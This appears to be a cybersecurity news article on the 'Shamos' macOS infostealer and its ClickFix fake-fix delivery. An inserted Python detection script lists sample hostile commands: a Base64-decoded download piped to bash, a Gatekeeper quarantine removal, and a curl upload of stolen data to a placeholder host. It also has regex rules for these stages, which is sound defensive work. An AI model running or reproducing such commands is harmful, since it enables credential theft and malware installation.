
Fake Mac Fixes Disguise New ‘Shamos’ Infostealer in ClickFix Attacks

A new wave of macOS-targeting malware has surfaced, and it is catching unsuspecting users off guard with fake troubleshooting fixes. The newly discovered malware, dubbed “Shamos”, is a dangerous infostealer developed by the cybercriminal group known as COOKIE SPIDER. According to CrowdStrike, Shamos has already attempted infections in over 300 monitored environments worldwide since June 2025, raising alarms across the cybersecurity industry.

The attackers distribute Shamos through ClickFix attacks—a social engineering tactic where victims are tricked into pasting commands into the macOS Terminal under the guise of resolving system issues. These commands appear to fix problems like printer errors or system crashes but instead download and execute malicious payloads. The fake fixes are promoted through malvertising campaigns, spoofed GitHub repositories, and even sponsored Google results on domains such as mac-safer[.]com and rescue-mac[.]com.

Once users copy and paste the provided commands, the pasted command decodes a Base64-encoded URL and fetches a malicious Bash script from a remote server. This script captures the victim’s password, downloads the Shamos Mach-O executable, and bypasses Gatekeeper protections using xattr and chmod commands. By doing so, Shamos ensures its malicious code runs without triggering standard macOS defenses.

Once installed, Shamos runs anti-VM checks to evade detection in sandboxes, then executes reconnaissance via AppleScript commands. It targets:

  • Keychain data
  • Apple Notes
  • Cryptocurrency wallets
  • Web browser credentials and stored data

All harvested information is compressed into a file named out.zip and exfiltrated to the attacker’s server using curl. In cases where attackers gain sudo privileges, Shamos creates a persistence mechanism by installing a LaunchDaemon plist file, ensuring it runs automatically on system startup. Beyond data theft, Shamos has been seen deploying spoofed Ledger Live wallet apps and even botnet modules, signaling its versatility as a multipurpose threat.
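The command-line stages described in the two paragraphs above (a Base64-decoded download piped into a shell, the xattr/chmod Gatekeeper bypass, a curl upload of out.zip, and a LaunchDaemon plist install) map directly onto simple detection rules over collected shell commands. The Python below is an added example for defenders, not code from the article or from CrowdStrike; the sample commands, rule names and example.invalid hostnames are constructed, and any real deployment would run over EDR or shell-history telemetry instead of the embedded list.

```python
import re

# Constructed sample command lines, of the kind an EDR or shell-history audit
# on a Mac might collect. Hostnames use example.invalid; nothing here is a
# real Shamos indicator.
SAMPLE_COMMANDS = [
    'echo "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaS5zaA==" | base64 -d | xargs curl -fsSL | bash',
    'xattr -d com.apple.quarantine /tmp/update && chmod +x /tmp/update',
    'curl -F "file=@/tmp/out.zip" http://example.invalid/upload',
    'sudo cp /tmp/com.example.helper.plist /Library/LaunchDaemons/',
    'ls -la ~/Documents',
    'brew upgrade',
]

# (rule name, stage of the chain the article describes, pattern)
RULES = [
    ("base64_decode_to_shell", "delivery",
     re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba)?sh\b")),
    ("quarantine_attr_removed", "gatekeeper_bypass",
     re.compile(r"xattr\b.*com\.apple\.quarantine")),
    ("chmod_exec_in_tmp", "gatekeeper_bypass",
     re.compile(r"chmod\s+\+x\s+/(private/)?tmp/")),
    ("curl_upload_out_zip", "exfiltration",
     re.compile(r"curl\b.*(-F|--form|-T|--upload-file|-d|--data).*out\.zip")),
    ("launchdaemon_plist_install", "persistence",
     re.compile(r"(cp|mv|tee|launchctl\s+(load|bootstrap))\b.*/Library/LaunchDaemons/")),
]


def scan_commands(commands):
    """Return (command, rule_name, stage) for every rule that matches a command."""
    hits = []
    for cmd in commands:
        for name, stage, pattern in RULES:
            if pattern.search(cmd):
                hits.append((cmd, name, stage))
    return hits


def chain_coverage(hits):
    """Distinct stages seen; several stages in one session is the strong signal,
    since any single rule (e.g. a LaunchDaemon copy) can also fire on admin work."""
    return sorted({stage for _, _, stage in hits})


if __name__ == "__main__":
    found = scan_commands(SAMPLE_COMMANDS)
    for cmd, name, stage in found:
        print(f"[{stage}] {name}: {cmd}")
    print("stages observed:", chain_coverage(found))
```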

ClickFix attacks are not new but have become increasingly prevalent across multiple platforms. Threat actors have embedded these tactics in TikTok videos, fake captchas, and Google Meet error pages. The simplicity of convincing a user to paste a command makes this strategy highly effective, even against technically savvy users. Alarmingly, the same delivery method has also been leveraged in ransomware campaigns and state-sponsored cyber-espionage operations.

Cybersecurity experts emphasize that macOS users should never execute commands from online sources unless they fully understand their purpose. GitHub, despite its legitimacy, remains a common platform for malware distribution. Users should rely on Apple’s official support forums or the system’s built-in Help tool instead of clicking on suspicious ads or search results. CrowdStrike’s findings underline the urgency for users to adopt a “zero trust” approach to unverified fixes.

The rise of Shamos demonstrates how clever social engineering and technical evasion can bypass user caution and system defenses. By disguising itself as a solution, Shamos turns curiosity and trust into vulnerabilities. As ClickFix campaigns grow in sophistication, awareness remains the strongest defense. Users and organizations must approach troubleshooting advice online with skepticism, avoiding quick fixes from unknown sources. Shamos is just the latest example proving that in cybersecurity, if it looks too helpful to be true, it probably is.
